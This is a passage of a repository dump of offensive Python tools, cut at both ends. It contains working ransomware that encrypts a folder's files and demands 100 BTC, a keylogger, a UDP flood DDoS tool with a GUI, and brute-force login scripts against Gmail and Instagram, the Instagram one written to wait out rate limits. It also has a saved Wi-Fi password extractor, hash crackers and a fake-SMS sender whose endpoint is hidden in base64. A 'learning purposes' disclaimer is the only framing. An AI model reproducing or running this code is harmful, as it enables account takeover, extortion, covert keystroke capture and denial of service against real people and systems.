----------------------------\n") 119 | while True: 120 | checkMails() 121 | time.sleep(5) 122 | 123 | except(KeyboardInterrupt): 124 | deleteMail() 125 | print("\nProgramme Interrupted") 126 | os.system('cls' if os.name == 'nt' else 'clear') -------------------------------------------------------------------------------- /fakesms.py: -------------------------------------------------------------------------------- 1 | import re 2 | import os 3 | import time 4 | import platform 5 | import base64 6 | 7 | print("[*] Checking Requirements Module") 8 | if platform.system().startswith("Linux"): 9 | try: 10 | import requests 11 | except ImportError: 12 | os.system("python3 -m pip install requests -q -q -q") 13 | import requests 14 | try: 15 | import termcolor 16 | except ImportError: 17 | os.system("python3 -m pip install termcolor -q -q -q") 18 | import termcolor 19 | try: 20 | from pystyle import * 21 | except: 22 | os.system("python3 -m pip install pystyle") 23 | from pystyle import * 24 | try: 25 | import colorama 26 | except ImportError: 27 | os.system("python3 -m pip install colorama") 28 | import colorama 29 | 30 | 31 | elif platform.system().startswith("Windows"): 32 | try: 33 | import requests 34 | except ImportError: 35 | os.system("python -m pip install requests -q -q -q") 36 | import requests 37 | try: 38 | import termcolor 39 | except ImportError: 40 | os.system("python -m pip install termcolor -q -q -q") 41 | import termcolor 42 | try: 43 | from pystyle import * 44 | except: 45 | os.system("python -m pip install pystyle") 46 | from pystyle import * 47 | try: 48 | import colorama 49 | except ImportError: 50 | os.system("python -m pip install colorama") 51 | import colorama 52 | 53 | 54 | colorama.deinit() 55 | banner = Center.XCenter(""" 56 | _______ _ _ _______ ____ __ __ ____ 57 | / / ___/ \ | |/ / ____| / ___|| \/ / ___\\ 58 | | || |_ / _ \ | ' /| _| ____\___ \| |\/| \___ \| | 59 | < < | _/ ___ \| . \| |__|_____|__) | | | |___) )>> 60 | | ||_|/_/ \_\_|\_\_____| |____/|_| |_|____/ 61 | 62 | """) 63 | 64 | def check_net1(): 65 | print(termcolor.colored("[*] Checking Internet Connection:- ", 'cyan')) 66 | url = "https://www.google.com" 67 | timeout = 5 68 | try: 69 | request = requests.get(url, timeout=timeout) 70 | print(termcolor.colored("[*] Connected to the Internet", 'green')) 71 | os.system('cls' if os.name == 'nt' else 'clear') 72 | print(Colorate.Vertical(Colors.green_to_yellow, banner, 2)) 73 | menu() 74 | except (requests.ConnectionError, requests.Timeout) as exception: 75 | print(termcolor.colored("[*] No internet connection.", 'red')) 76 | 77 | 78 | def menu(): 79 | ans = True 80 | while ans: 81 | print(termcolor.colored(""" 82 | 1.Usage 83 | 2.Send SMS 84 | 3.Exit/Quit 85 | """, 'yellow')) 86 | ans = input(termcolor.colored("Choose From Given Options: ", 'cyan')) 87 | if ans == "1": 88 | print("\033c") 89 | usage1() 90 | elif ans == "2": 91 | print("\033c") 92 | main_check1() 93 | elif ans == "3": 94 | print("\033c") 95 | print(Colorate.Vertical(Colors.green_to_yellow, banner, 2)) 96 | print(termcolor.colored("\n Thanks For Using Fake-SMS! See You Tomorrow", 'red')) 97 | ans = None 98 | else: 99 | print(termcolor.colored("\n Not Valid Choice Try again", 'red')) 100 | 101 | 102 | def usage1(): 103 | print(Colorate.Vertical(Colors.green_to_yellow, banner, 2)) 104 | print(termcolor.colored(''' 105 | \n 1. Your Country Code Must Be without + 106 | 2. Country Code Example: 91 107 | 3. Your Phone Number Must be Start Without 0 108 | 4. Full Usage: 913443210111 109 | 110 | ..........NOTE: Only One Text Message Is Allowed Per Day........... 111 | 112 | ''', 'magenta')) 113 | 114 | 115 | def main_check1(): 116 | print(Colorate.Vertical(Colors.green_to_yellow, banner, 2)) 117 | x = input(termcolor.colored("\n[*] Enter Your Number:- ", 'green')) 118 | y = input(termcolor.colored("\n[*] Enter Your Message:- ", 'blue')) 119 | message = base64.b64decode('aHR0cHM6Ly90ZXh0YmVsdC5jb20vdGV4dA=='.encode('ascii')).decode('ascii') 120 | resp = requests.post(f'{message}', { 121 | 'phone': x, 122 | 'message': y, 123 | 'key': 'textbelt', 124 | }) 125 | print(termcolor.colored("\n[*] Sending message ", 'yellow')) 126 | time.sleep(2) 127 | z = str(resp.json()) 128 | n = 'False' 129 | if re.search(n, z): 130 | print(termcolor.colored('\n[ X ] Message not sent! Please Try Again SomeTime Or Use Any Eurpose Based Vpn', 131 | 'red')) 132 | else: 133 | print(termcolor.colored('\n[ ✔ ] Message sent ', 'green')) 134 | 135 | 136 | def op(): 137 | try: 138 | if platform.system().startswith("Windows"): 139 | os.system("cls") 140 | print(Colorate.Vertical(Colors.green_to_yellow, banner, 2)) 141 | check_net1() 142 | elif platform.system().startswith("Linux"): 143 | print("\033c") 144 | check_net1() 145 | else: 146 | print(termcolor.colored("Please Use Windows Or Linux OS!", 'red')) 147 | except KeyboardInterrupt: 148 | print(termcolor.colored("\nYou Pressed The Exit Button!", 'red')) 149 | quit() 150 | 151 | 152 | op() 153 | input(" ENter To EXit") 154 | -------------------------------------------------------------------------------- /filemonitor.py: -------------------------------------------------------------------------------- 1 | # import the modules 2 | import sys 3 | import time 4 | import logging 5 | from watchdog.observers import Observer 6 | from watchdog.events import LoggingEventHandler 7 | 8 | print (''' 9 | **************************************************** 10 | * ___ _ _ __ __ _ _ * 11 | * | __(_) |___ | \/ |___ _ _ (_) |_ ___ _ _ * 12 | * | _|| | / -_) | |\/| / _ \ ' \| | _/ _ \ '_| * 13 | * |_| |_|_\___| |_| |_\___/_||_|_|\__\___/_| * 14 | * * 15 | * a code to observe and * 16 | * detect changes in a particular directory * 17 | * * 18 | **************************************************** 19 | ''') 20 | 21 | if __name__ == "__main__": 22 | # Set the format for logging info 23 | logging.basicConfig(level=logging.INFO, 24 | format='%(asctime)s - %(message)s', 25 | datefmt='%Y-%m-%d %H:%M:%S') 26 | 27 | # Set format for displaying path 28 | path = sys.argv[1] if len(sys.argv) > 1 else '.' 29 | 30 | # Initialize logging event handler 31 | event_handler = LoggingEventHandler() 32 | 33 | # Initialize Observer 34 | observer = Observer() 35 | observer.schedule(event_handler, path, recursive=True) 36 | 37 | # Start the observer 38 | observer.start() 39 | try: 40 | while True: 41 | # Set the thread sleep time 42 | time.sleep(1) 43 | except KeyboardInterrupt: 44 | observer.stop() 45 | observer.join() 46 | input("Enter To Exit") -------------------------------------------------------------------------------- /get_wifipass.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import os 3 | import re 4 | from collections import namedtuple 5 | import configparser 6 | 7 | print (''' 8 | *************************************************************** 9 | * ___ _ __ ___ __ _ ___ * 10 | * / __|___| |\ \ / (_)/ _(_) _ \__ _ ______ * 11 | * | (_ / -_) _\ \/\/ /| | _| | _/ _` (_-<_-< * 12 | * \___\___|\__|\_/\_/ |_|_| |_|_| \__,_/__/__/ * 13 | * * 14 | * powerful tool to get all wifi-passwords in seconds * 15 | * code from R3dHULK * 16 | * download link : https://github.com/R3DHULK/getwifipass * 17 | * * 18 | *************************************************************** 19 | ''') 20 | 21 | def get_windows_saved_ssids(): 22 | """Returns a list of saved SSIDs in a Windows machine using netsh command""" 23 | # get all saved profiles in the PC 24 | output = subprocess.check_output("netsh wlan show profiles").decode() 25 | ssids = [] 26 | profiles = re.findall(r"All User Profile\s(.*)", output) 27 | for profile in profiles: 28 | # for each SSID, remove spaces and colon 29 | ssid = profile.strip().strip(":").strip() 30 | # add to the list 31 | ssids.append(ssid) 32 | return ssids 33 | 34 | 35 | def get_windows_saved_wifi_passwords(verbose=1): 36 | """Extracts saved Wi-Fi passwords saved in a Windows machine, this function extracts data using netsh 37 | command in Windows 38 | Args: 39 | verbose (int, optional): whether to print saved profiles real-time. Defaults to 1. 40 | Returns: 41 | [list]: list of extracted profiles, a profile has the fields ["ssid", "ciphers", "key"] 42 | """ 43 | ssids = get_windows_saved_ssids() 44 | Profile = namedtuple("Profile", ["ssid", "ciphers", "key"]) 45 | profiles = [] 46 | for ssid in ssids: 47 | ssid_details = subprocess.check_output(f"""netsh wlan show profile "{ssid}" key=clear""").decode() 48 | # get the ciphers 49 | ciphers = re.findall(r"Cipher\s(.*)", ssid_details) 50 | # clear spaces and colon 51 | ciphers = "/".join([c.strip().strip(":").strip() for c in ciphers]) 52 | # get the Wi-Fi password 53 | key = re.findall(r"Key Content\s(.*)", ssid_details) 54 | # clear spaces and colon 55 | try: 56 | key = key[0].strip().strip(":").strip() 57 | except IndexError: 58 | key = "None" 59 | profile = Profile(ssid=ssid, ciphers=ciphers, key=key) 60 | if verbose >= 1: 61 | print_windows_profile(profile) 62 | profiles.append(profile) 63 | return profiles 64 | 65 | 66 | def print_windows_profile(profile): 67 | """Prints a single profile on Windows""" 68 | print(f"{profile.ssid:25}{profile.ciphers:15}{profile.key:50}") 69 | 70 | 71 | def print_windows_profiles(verbose): 72 | """Prints all extracted SSIDs along with Key on Windows""" 73 | print("SSID CIPHER(S) KEY") 74 | get_windows_saved_wifi_passwords(verbose) 75 | 76 | 77 | def get_linux_saved_wifi_passwords(verbose=1): 78 | """Extracts saved Wi-Fi passwords saved in a Linux machine, this function extracts data in the 79 | `/etc/NetworkManager/system-connections/` directory 80 | Args: 81 | verbose (int, optional): whether to print saved profiles real-time. Defaults to 1. 82 | Returns: 83 | [list]: list of extracted profiles, a profile has the fields ["ssid", "auth-alg", "key-mgmt", "psk"] 84 | """ 85 | network_connections_path = "/etc/NetworkManager/system-connections/" 86 | fields = ["ssid", "auth-alg", "key-mgmt", "psk"] 87 | Profile = namedtuple("Profile", [f.replace("-", "_") for f in fields]) 88 | profiles = [] 89 | for file in os.listdir(network_connections_path): 90 | data = { k.replace("-", "_"): None for k in fields } 91 | config = configparser.ConfigParser() 92 | config.read(os.path.join(network_connections_path, file)) 93 | for _, section in config.items(): 94 | for k, v in section.items(): 95 | if k in fields: 96 | data[k.replace("-", "_")] = v 97 | profile = Profile(**data) 98 | if verbose >= 1: 99 | print_linux_profile(profile) 100 | profiles.append(profile) 101 | return profiles 102 | 103 | 104 | def print_linux_profile(profile): 105 | """Prints a single profile on Linux""" 106 | print(f"{str(profile.ssid):25}{str(profile.auth_alg):5}{str(profile.key_mgmt):10}{str(profile.psk):50}") 107 | 108 | 109 | def print_linux_profiles(verbose): 110 | """Prints all extracted SSIDs along with Key (PSK) on Linux""" 111 | print("SSID AUTH KEY-MGMT PSK") 112 | get_linux_saved_wifi_passwords(verbose) 113 | 114 | 115 | def print_profiles(verbose=1): 116 | if os.name == "nt": 117 | print_windows_profiles(verbose) 118 | elif os.name == "posix": 119 | print_linux_profiles(verbose) 120 | else: 121 | raise NotImplemented("Code only works for either Linux or Windows") 122 | 123 | print (''' 124 | 125 | *************************************************************** 126 | * * 127 | * 🔴NOTE : '' THIS TOOL ONLY GRABS THE PASSWORDS * 128 | * WHICH WAS INPUTED IN THE COMPUTER EARLIER * 129 | * IF THE PASSWORD IS CHANGED BY OWNER, * 130 | * THIS TOOL CAN'T HELP YOU TO HACK THE SSID * 131 | * OR LET YOU KNOW THE AFTER RESULTS '' * 132 | * * 133 | *************************************************************** 134 | ''') 135 | print (''' 136 | [*] Hulk starts to catch ssid cipher and key ... 137 | 138 | [!] Hulk came up with ::: 139 | ''') 140 | if __name__ == "__main__": 141 | print_profiles() 142 | input("Enter To Continue") -------------------------------------------------------------------------------- /getip.py: -------------------------------------------------------------------------------- 1 | import socket 2 | from django.core.validators import URLValidator 3 | from django.core.exceptions import ValidationError 4 | 5 | 6 | logo = ''' 7 | ____ _ _ ___ 8 | ( __) ( ) ((())) ( ) 9 | | | _ ___ | _) | | | O | 10 | ( )_))( o_)( ) ( ) ( __/ 11 | /____\ \( /_\ /_\ /_\ 12 | 13 | code from R3DHULK 14 | 15 | ****************************************** 16 | * * 17 | * coded simple python script * 18 | * to know about url's ip * 19 | * and validity * 20 | * * 21 | ****************************************** 22 | ''' 23 | 24 | print (logo) 25 | 26 | 27 | hostname = socket.gethostname() 28 | myip = socket.gethostbyname(hostname) 29 | 30 | print ( " You are working on " + hostname) 31 | print (" Your IP is " + myip) 32 | 33 | url = URLValidator() 34 | 35 | 36 | try: 37 | 38 | url = input ("Enter Url to get it's IP : ") 39 | 40 | print("It is a valid URL") 41 | print("The IP for this " + url + " is ", socket.gethostbyname(url)) 42 | 43 | except ValidationError as exception: 44 | 45 | print("It is not a valid URL") 46 | input("Enter To Exit") -------------------------------------------------------------------------------- /hack-gmail.py: -------------------------------------------------------------------------------- 1 | import smtplib 2 | import sys 3 | from os import system 4 | import os 5 | os.system("clear") 6 | def artwork(): 7 | print("\n") 8 | print(" ##########################################################") 9 | print(" # #") 10 | print(" # \||/ #") 11 | print(" # | @___oo #") 12 | print(" # /\ /\ / (__,,,,| #") 13 | print(" # ) /^\) ^\/ _) Gmail-hack! #") 14 | print(" # ) /^\/ _) CoDeD By: #") 15 | print(" # ) _ / / _) d4az #") 16 | print(" # /\ )/\/ || | )_) Modified By #") 17 | print(" # < > |(,,) )__) R3DHULK #") 18 | print(" # || / \)___)\ #") 19 | print(" # | \____( )___) )___ #") 20 | print(" # \______(_______;;; __;;; #") 21 | print(" # #") 22 | print(" # inspired from https://github.com/z9fr/hack-gmail #") 23 | print(" # a little modified by : #") 24 | print(" # https://github.com/R3DHULK #") 25 | print(" ##########################################################") 26 | print("\n") 27 | 28 | try: 29 | artwork() 30 | smtpserver = smtplib.SMTP("smtp.gmail.com", 587) 31 | 32 | smtpserver.ehlo() 33 | smtpserver.starttls() 34 | 35 | user = input(" [*] Enter The Target Gmail Adress => ") 36 | 37 | print("\n") 38 | 39 | pwd = input(" [*] Enter '1' to use the inbuilt passwords list \n [*] Enter '2' to Add a custom password list\n => ") 40 | 41 | if pwd=='1': 42 | passswfile="rockyou.txt" 43 | 44 | elif pwd=='2': 45 | print("\n") 46 | passswfile = input(" [+] Name The File Path (For Password List) => ") 47 | 48 | else: 49 | print("\n") 50 | print("Invalid input!") 51 | sys.exit(1) 52 | try: 53 | passswfile = open(passswfile, "r") 54 | 55 | except Exception as e: 56 | print(e) 57 | sys.exit(1) 58 | 59 | for password in passswfile: 60 | try: 61 | smtpserver.login(user, password) 62 | 63 | print(" [+] Password Found %s" % password) 64 | break 65 | 66 | except smtplib.SMTPAuthenticationError: 67 | print(" [!] Pasword Is Wrong. %s " % password) 68 | except KeyboardInterrupt: 69 | print("\n [-] CTRL+C DETECTED......Exiting \n") 70 | input("Enter To Exit") 71 | os.system("clear") 72 | -------------------------------------------------------------------------------- /hulk-gui.py: -------------------------------------------------------------------------------- 1 | from tkinter import * 2 | from tkinter.ttk import * 3 | from time import strftime 4 | 5 | 6 | def time(): 7 | 8 | string = strftime('%H:%M:%S %p') 9 | 10 | lbl.config(text=string) 11 | 12 | lbl.after(1000, time) 13 | 14 | 15 | def attack(): 16 | import sys 17 | import os 18 | import time 19 | import socket 20 | import random 21 | # Code Time 22 | from datetime import datetime 23 | now = datetime.now() 24 | hour = now.hour 25 | minute = now.minute 26 | day = now.day 27 | month = now.month 28 | year = now.year 29 | 30 | ############## 31 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 32 | bytes = random._urandom(1490) 33 | ############# 34 | 35 | os.system("clear") 36 | 37 | #ip = raw_input("IP Target : ") 38 | #port = input("Port : ") 39 | global pr 40 | pr = E1.get() 41 | ip = pr 42 | global rt 43 | rt = E2.get() 44 | port = (int(rt)) 45 | 46 | os.system("clear") 47 | #os.system("figlet Attack Starting") 48 | print("[> ] 0% ") 49 | time.sleep(0.5) 50 | print("[=====> H ] 25%") 51 | time.sleep(0.5) 52 | print("[==========> U ] 50%") 53 | time.sleep(0.5) 54 | print("[========== L ====> ] 75%") 55 | time.sleep(0.5) 56 | print("[========== K ========>] 100%") 57 | time.sleep(3) 58 | sent = 0 59 | while True: 60 | sock.sendto(bytes, (ip, port)) 61 | sent = sent + 1 62 | port = port + 1 63 | print("Sent %s packet to %s throught port:%s -by HULK" % 64 | (sent, ip, port)) 65 | if port == 65534: 66 | port = 1 67 | 68 | pass 69 | 70 | 71 | root = Tk() 72 | root.title("HULK- DDOS Attack Tool") 73 | root.geometry("350x200+385+105") 74 | root.resizable(0, 0) 75 | 76 | lbl = Label(root, font=('calibri', 20, 'bold'), 77 | 78 | background='purple', 79 | 80 | foreground='white') 81 | 82 | lbl.pack(anchor='s') 83 | time() 84 | 85 | global E1 86 | global E2 87 | L1 = Label(root, text="ip address") 88 | L1.pack(side=TOP) 89 | E1 = Entry(root) # , bd =5) 90 | E1.pack(side=TOP) 91 | 92 | 93 | L2 = Label(root, text="port") 94 | L2.pack(side=TOP) 95 | E2 = Entry(root) # , bd =5) 96 | E2.pack(side=TOP) 97 | 98 | button = Button(root, text="attack", command=attack).pack( 99 | side=TOP) # ,font=('comicsansms 19 bold')).pack(side=TOP) 100 | root.mainloop() 101 | -------------------------------------------------------------------------------- /insta.py: -------------------------------------------------------------------------------- 1 | from splinter import Browser 2 | import time 3 | import sys 4 | wait_time = (11 * 60 + 35) # 11 mins and 35 seconds 5 | problem_logging_in = "There was a problem logging you into Instagram. Please try again soon." 6 | 7 | 8 | def logInSuccess(browser): 9 | user_err_msg = "The username you entered doesn't belong to an account. Please check your username and try again." 10 | pass_err_msg = "Sorry, your password was incorrect. Please double-check your password." 11 | return not (browser.is_text_present(user_err_msg) or browser.is_text_present(pass_err_msg)) 12 | 13 | 14 | correctPassword = None 15 | account_username = sys.argv[1] 16 | with Browser('firefox', headless=True) as browser: 17 | browser.visit('https://www.instagram.com') 18 | browser.find_by_text("Log in").first.click() 19 | username_form = browser.find_by_name('username').first 20 | password_form = browser.find_by_name('password').first 21 | login_button = browser.find_by_text('Log in').first 22 | username_form.fill(account_username) 23 | for password in sys.stdin: 24 | if len(password) < 6: 25 | print('Skipping password: ' + password) 26 | continue 27 | 28 | print('Testing password: ' + password) 29 | password_form.clear() 30 | password_form.fill(password) 31 | login_button.click() 32 | 33 | if browser.is_text_present(problem_logging_in): 34 | print('Waiting for timeout to end.') 35 | time.sleep(wait_time) 36 | print('Timeout has ended, resuming.') 37 | elif logInSuccess(browser): 38 | correctPassword = password 39 | break 40 | if correctPassword == None: 41 | print("Unable to find correct password.") 42 | else: 43 | print("Password for username: " + account_username + " = " + password) 44 | -------------------------------------------------------------------------------- /instagram-osint.py: -------------------------------------------------------------------------------- 1 | # importing libraries 2 | from bs4 import BeautifulSoup 3 | import requests 4 | 5 | # instagram URL 6 | URL = "https://www.instagram.com/{}/" 7 | 8 | # parse function 9 | 10 | 11 | def parse_data(s): 12 | 13 | # creating a dictionary 14 | data = {} 15 | 16 | # splitting the content 17 | # then taking the first part 18 | s = s.split("-")[0] 19 | 20 | # again splitting the content 21 | s = s.split(" ") 22 | 23 | # assigning the values 24 | data['Followers'] = s[0] 25 | data['Following'] = s[2] 26 | data['Posts'] = s[4] 27 | 28 | # returning the dictionary 29 | return data 30 | 31 | # scrape function 32 | 33 | 34 | def scrape_data(username): 35 | 36 | # getting the request from url 37 | r = requests.get(URL.format(username)) 38 | 39 | # converting the text 40 | s = BeautifulSoup(r.text, "html.parser") 41 | 42 | # finding meta info 43 | meta = s.find("meta", property="og:description") 44 | 45 | # calling parse method 46 | return parse_data(meta.attrs['content']) 47 | 48 | 49 | # main function 50 | if __name__ == "__main__": 51 | # banner 52 | print("\t\033[93m Instagram Osint") 53 | print("\t-----------------") 54 | # user name 55 | username = input("\n\033[92m [*] Enter Username: ") 56 | data = scrape_data(username) 57 | 58 | # printing the info 59 | print(data) 60 | input("\n [+] Enter to Exit") -------------------------------------------------------------------------------- /ip-scanner.py: -------------------------------------------------------------------------------- 1 | import socket 2 | from sys import modules 3 | import time 4 | import threading 5 | from queue import Queue 6 | 7 | # pip install modules 8 | 9 | # Don't dare to copy my code, I'll eat your cookies 10 | # else you build yourself or copy others 11 | 12 | logo = ''' 13 | _ _ _ _ _ _ __ _____ 14 | | | | | | | | | | | / / / ___| 15 | | |_| | | | | | | |/ / \ `--. ___ __ _ _ __ _ __ ___ _ __ 16 | | _ | | | | | | \ `--. \/ __/ _` | '_ \| '_ \ / _ \ '__| 17 | | | | | |_| | |___| |\ \ /\__/ / (_| (_| | | | | | | | __/ | 18 | \_| |_/\___/\_____|_| \_/ \____/ \___\__,_|_| |_|_| |_|\___|_| 19 | 20 | coded by Sumalya Chatterjee 21 | ''' 22 | print(logo) 23 | print("wait, redhulk is building the code ...") 24 | socket.setdefaulttimeout(0.25) 25 | lock = threading.Lock() 26 | 27 | ip_address = input('IP Address or Website URL : ') 28 | host = socket.gethostbyname(ip_address) 29 | print ('Scanning on IP Address: ', host) 30 | 31 | def scan(port): 32 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 33 | try: 34 | con = sock.connect((host, port)) 35 | with lock: 36 | print(port, 'is open') 37 | con.close() 38 | except: 39 | pass 40 | 41 | def execute(): 42 | while True: 43 | worker = queue.get() 44 | scan(worker) 45 | queue.task_done() 46 | 47 | queue = Queue() 48 | start_time = time.time() 49 | 50 | for x in range(100): 51 | thread = threading.Thread(target = execute) 52 | thread.daemon = True 53 | thread.start() 54 | 55 | for worker in range(1, 500): 56 | queue.put(worker) 57 | 58 | queue.join() 59 | 60 | print('Time taken:', time.time() - start_time) 61 | print ("Thank You for using my tool :>") 62 | input("Enter To Continue") -------------------------------------------------------------------------------- /keylogger-in-python.py: -------------------------------------------------------------------------------- 1 | # Python code for keylogger 2 | # import modules 3 | import os 4 | import pyxhook 5 | 6 | # This tells the keylogger where the log file will go. 7 | # You can set the file path as an environment variable ('pylogger_file'), 8 | # or use the default ~/Desktop/file.log 9 | log_file = os.environ.get( 10 | 'pylogger_file', 11 | os.path.expanduser('~/Desktop/file.log') 12 | ) 13 | # Allow setting the cancel key from environment args, Default: ` 14 | cancel_key = ord( 15 | os.environ.get( 16 | 'pylogger_cancel', 17 | '`' 18 | )[0] 19 | ) 20 | 21 | # Allow clearing the log file on start, if pylogger_clean is defined. 22 | if os.environ.get('pylogger_clean', None) is not None: 23 | try: 24 | os.remove(log_file) 25 | except EnvironmentError: 26 | # File does not exist, or no permissions. 27 | pass 28 | 29 | #creating key pressing event and saving it into log file 30 | def OnKeyPress(event): 31 | with open(log_file, 'a') as f: 32 | f.write('{}\n'.format(event.Key)) 33 | 34 | # create a hook manager object 35 | new_hook = pyxhook.HookManager() 36 | new_hook.KeyDown = OnKeyPress 37 | # set the hook 38 | new_hook.HookKeyboard() 39 | try: 40 | new_hook.start() # start the hook 41 | except KeyboardInterrupt: 42 | # User cancelled from command line. 43 | pass 44 | except Exception as ex: 45 | # Write exceptions to the log file, for analysis later. 46 | msg = 'Error while catching events:\n {}'.format(ex) 47 | pyxhook.print_err(msg) 48 | with open(log_file, 'a') as f: 49 | f.write('\n{}'.format(msg)) 50 | -------------------------------------------------------------------------------- /linux_pass_cracker.py: -------------------------------------------------------------------------------- 1 | import crypt,time 2 | try: 3 | password = open("password.txt", 'r') 4 | for passwd in password.readlines(): 5 | passwd = passwd.strip("\n").strip("\r") 6 | var = crypt.crypt(passwd,"$6$"+"8HOLitkI") 7 | if var == "$6$8HOLitkI$9HECw2MBzISI1O.RoyJdfugy4VHsTOU4RDTewcFECnZdWLpmtVwNo5a1/hg2kw4Qu74F08eMEwpLdK1eovfEd/": 8 | print("\033[94m [+] Password Found: ", passwd ) 9 | break 10 | else: 11 | print("\033[92m [*] Trying....") 12 | except KeyboardInterrupt: 13 | print("\n \033[91m[-] KeyBoard Interrupted") 14 | time.sleep(4) 15 | -------------------------------------------------------------------------------- /mac-changer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import optparse 4 | 5 | def change_mac(interface, new_mac): 6 | print("[+] Changing MAC for interface " + interface + " to " + new_mac) 7 | 8 | subprocess.call(["ifconfig", interface, "down"]) 9 | subprocess.call(["ifconfig", interface, "hw", "ether", new_mac]) 10 | subprocess.call(["ifconfig", interface, "up"]) 11 | 12 | def get_arguments(): 13 | parser = optparse.OptionParser() 14 | parser.add_option("-i", "--interface", dest="interface", help="Specify interface to change MAC for, use --help for usage") 15 | parser.add_option("-m", "--mac", dest="new_mac", help="Specify the new MAC , use --help for usage") 16 | (options, agruments) = parser.parse_args() 17 | if not options.interface: 18 | parser.error("[-] Please specify interface, use --help for usage") 19 | elif not options.new_mac: 20 | parser.error("[-] Please specify MAC , use --help for usage") 21 | return options 22 | 23 | 24 | 25 | options = get_arguments() 26 | change_mac(options.interface, options.new_mac) 27 | -------------------------------------------------------------------------------- /malware.py: -------------------------------------------------------------------------------- 1 | #1/usr/bin/env python3 2 | 3 | import os 4 | from cryptography.fernet import Fernet 5 | 6 | # find out files for encrypted 7 | 8 | files = [] 9 | for file in os.listdir(): 10 | if file == "malware.py" or file == "thekey.key" or file == "decrypt.py": 11 | continue 12 | if os.path.isfile(file): 13 | files.append(file) 14 | print(files) 15 | 16 | key = Fernet.generate_key() 17 | 18 | with open("thekey.key" , "wb") as thekey: 19 | thekey.write(key) 20 | 21 | for file in files: 22 | with open(file, "rb") as thefile: 23 | contents = thefile.read() 24 | contents_encrypted = Fernet(key).encrypt(contents) 25 | with open(file, "wb") as thefile: 26 | thefile.write(contents_encrypted) 27 | logo = ''' 28 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 29 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 30 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░███░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 31 | ░░░░░░░░░░░░░░░░░░░░░░░░░░██░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 32 | ░░░░░░░░░░░░░░░░░░░░░░░░███░░░█░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 33 | ░░░░░░░░░░░░░░░░░░░░░░░░█░░░░░█░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 34 | ░░░░░░░░░░░░░░░░░░░░░░░██░░░░░█░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 35 | ░░░░░░░░░░░░░░░░░░░░░░░█░░░░░░█░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 36 | ░░░░░░░░░░░░░░░░░░░░░░░█░░░░░░█░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 37 | ░░░░░░░░░░░░░░░░░░░░░░██░░░░░░███████░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 38 | ░░░░░░░░░░░░░░░░████░░█░░░░░░██░░░░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 39 | ░░░░░░░░░████░░██░░░███░░░░░░█░░░░░░░█░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 40 | ░░░░░░░░██░░████░░░░░░█░░░░░░█░░░░░░░█░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 41 | ░░░░░░░░█░░░░░█░░░░░░░█░░░░░░░░░░░░░░█░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 42 | ░░░░░░░░█░r3dhulk encrypts your data█░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 43 | ░░░░░░░░██░send him 100 BTC ░░░░░░░░█░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 44 | ░░░░░░░░░█░░░░░░░░░░░to unlock░░░░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 45 | ░░░░░░░░░░██░░░░░░░░░░░░░░░░░░░░░███░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 46 | ░░░░░░░░░░░██░░░░░░░░░░░░░░░░░░███░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 47 | ░░░░░░░░░░░░████████████████████░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 48 | ░░░░░░░░░░░░░░░███░░░Use it for learning purposes░░░░░░░░░░░░░░░░░░░░░ 49 | ░░░░░░░░░░░░░░░░░░███░░░developer is not responsible for any damages░░ 50 | ░░░░░░░░░░░░░░░░░░░░░███░░░github page : https://github.com/R3DHULK░░░ 51 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 52 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 53 | ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ 54 | ''' 55 | print(logo) 56 | -------------------------------------------------------------------------------- /md5hashcracker.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | print("**************PASSWORD CRACKER ******************") 3 | 4 | # To check if the password 5 | # found or not. 6 | pass_found = 0 7 | 8 | input_hash = input("Enter the hashed password:") 9 | 10 | pass_doc = input("\nEnter passwords filename including path(root / home/):") 11 | 12 | try: 13 | # trying to open the password file. 14 | pass_file = open(pass_doc, 'r') 15 | except: 16 | print("Error:") 17 | print(pass_doc, "is not found.\nPlease give the path of file correctly.") 18 | quit() 19 | 20 | 21 | # comparing the input_hash with the hashes 22 | # of the words in password file, 23 | # and finding password. 24 | 25 | for word in pass_file: 26 | # encoding the word into utf-8 format 27 | enc_word = word.encode('utf-8') 28 | 29 | # Hashing a word into md5 hash 30 | hash_word = hashlib.md5(enc_word.strip()) 31 | 32 | # digesting that hash into a hexa decimal value 33 | digest = hash_word.hexdigest() 34 | 35 | if digest == input_hash: 36 | # comparing hashes 37 | print("Password found.\nThe password is:", word) 38 | pass_found = 1 39 | break 40 | 41 | # if password is not found. 42 | if not pass_found: 43 | print("Password is not found in the", 